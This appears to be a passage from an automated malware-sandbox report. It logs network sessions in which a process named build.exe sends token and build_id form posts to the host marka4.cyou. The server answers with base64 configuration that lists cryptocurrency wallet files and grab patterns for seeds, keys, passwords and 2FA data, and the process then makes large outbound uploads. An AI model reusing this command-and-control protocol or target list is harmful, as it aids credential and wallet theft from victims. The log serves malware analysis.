2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49778	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:29 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----wt26phd26pz5f3ekf3eu User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74 Data Ascii: ------wt26phd26pz5f3ekf3euContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------wt26phd26pz5f3ekf3euContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------wt26phd26pz5f3ekf3euCont
2025-01-11 22:00:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:30 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49779	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:30 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----glfuas2v3w47yukxbasj User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:30 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 Data Ascii: ------glfuas2v3w47yukxbasjContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------glfuas2v3w47yukxbasjContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------glfuas2v3w47yukxbasjCont
2025-01-11 22:00:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49780	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:32 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5fctjwlnohdbaiwtrqqq User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 66 63 74 6a 77 6c 6e 6f 68 64 62 61 69 77 74 72 71 71 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 35 66 63 74 6a 77 6c 6e 6f 68 64 62 61 69 77 74 72 71 71 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 35 66 63 74 6a 77 6c 6e 6f 68 64 62 61 69 77 74 72 71 71 71 0d 0a 43 6f 6e 74 Data Ascii: ------5fctjwlnohdbaiwtrqqqContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------5fctjwlnohdbaiwtrqqqContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------5fctjwlnohdbaiwtrqqqCont
2025-01-11 22:00:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:32 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49781	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:33 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----d2djecbiwb1dbaas268y User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:33 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 64 32 64 6a 65 63 62 69 77 62 31 64 62 61 61 73 32 36 38 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 64 32 64 6a 65 63 62 69 77 62 31 64 62 61 61 73 32 36 38 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 64 32 64 6a 65 63 62 69 77 62 31 64 62 61 61 73 32 36 38 79 0d 0a 43 6f 6e 74 Data Ascii: ------d2djecbiwb1dbaas268yContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------d2djecbiwb1dbaas268yContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------d2djecbiwb1dbaas268yCont
2025-01-11 22:00:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:34 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49782	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:36 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8gdtjm7gvaaaie3wbaas User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 130273 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:36 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 38 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 38 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 0d 0a 43 6f 6e 74 Data Ascii: ------8gdtjm7gvaaaie3wbaasContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------8gdtjm7gvaaaie3wbaasContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------8gdtjm7gvaaaie3wbaasCont
